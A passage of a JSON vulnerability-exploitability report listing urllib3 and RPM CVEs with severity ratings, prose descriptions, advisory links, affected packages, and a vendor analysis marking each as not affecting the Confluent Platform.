          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        200
      ],
      "description": "urllib3 is an HTTP client library for Python. From 1.23 to before 2.7.0, cross-origin redirects followed from the low-level API via ProxyManager.connection_from_url().urlopen(..., assert_same_host=False) still forward these sensitive headers. This vulnerability is fixed in 2.7.0.",
      "recommendation": "Upgrade urllib3 to version 2.7.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44431"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28159"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36732"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44431"
        },
        {
          "url": "https://bugzilla.redhat.com/2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/2477167"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44431"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-28159.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:36732"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-44431.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-49927.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/06/msg00040.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8379-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44431"
        }
      ],
      "published": "2026-05-13T16:16:57+00:00",
      "updated": "2026-06-26T12:16:32+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/urllib3@2.6.3",
          "versions": [
            {
              "version": "2.6.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/urllib3@2.6.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44432",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        409
      ],
      "description": "urllib3 is an HTTP client library for Python. From 2.6.0 to before 2.7.0, urllib3 could decompress the whole response instead of the requested portion (1) during the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library or (2) when HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here). These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data) on the client side. This vulnerability is fixed in 2.7.0.",
      "recommendation": "Upgrade urllib3 to version 2.7.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44432"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:15862"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20338"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:22934"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24000"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24009"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24014"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24069"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24476"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24483"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24540"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24541"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24542"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:24544"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25039"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25143"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25928"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26212"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26304"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:27929"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28000"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28157"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28158"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28159"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28571"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30076"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30087"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30088"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30089"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:32992"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33313"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33683"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34526"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34533"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34607"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36350"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37275"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42144"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43038"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44481"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51206"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56347"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7625"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7634"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44432"
        },
        {
          "url": "https://bugzilla.redhat.com/2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/2477167"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477154"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44431"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44432"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-28159.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:32992"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2026-142.yaml"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-44432.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-32992.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-44432.json"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8379-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44432"
        }
      ],
      "published": "2026-05-13T16:16:57+00:00",
      "updated": "2026-08-19T12:18:19+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/urllib3@2.6.3",
          "versions": [
            {
              "version": "2.6.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/urllib3@2.6.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44604",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        78
      ],
      "description": "A command injection vulnerability was discovered in the `rpmuncompress` utility of RPM. When extracting certain archive formats (ZIP, 7z, GEM) to a specified destination directory, the tool inserts the archive's top-level folder name into a shell command without properly sanitizing it. A specially crafted archive containing shell metacharacters in its folder name can execute arbitrary commands as the user running the extraction.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44604"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28491"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44604"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460967"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44604"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44604"
        }
      ],
      "published": "2026-05-28T08:16:35+00:00",
      "updated": "2026-06-23T20:16:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44605",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in the RPM Package Manager (RPM). A local user could be affected by a heap buffer overflow vulnerability when processing a specially crafted NDB database file. This issue arises from an error in how RPM handles certain calculations during file parsing, leading to an incorrect memory allocation. An attacker could leverage this to cause a denial of service, making the system unavailable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44605"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33507"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44605"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482481"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44605"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44605"
        }
      ],
      "published": "2026-08-05T18:17:11+00:00",
      "updated": "2026-08-06T15:37:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
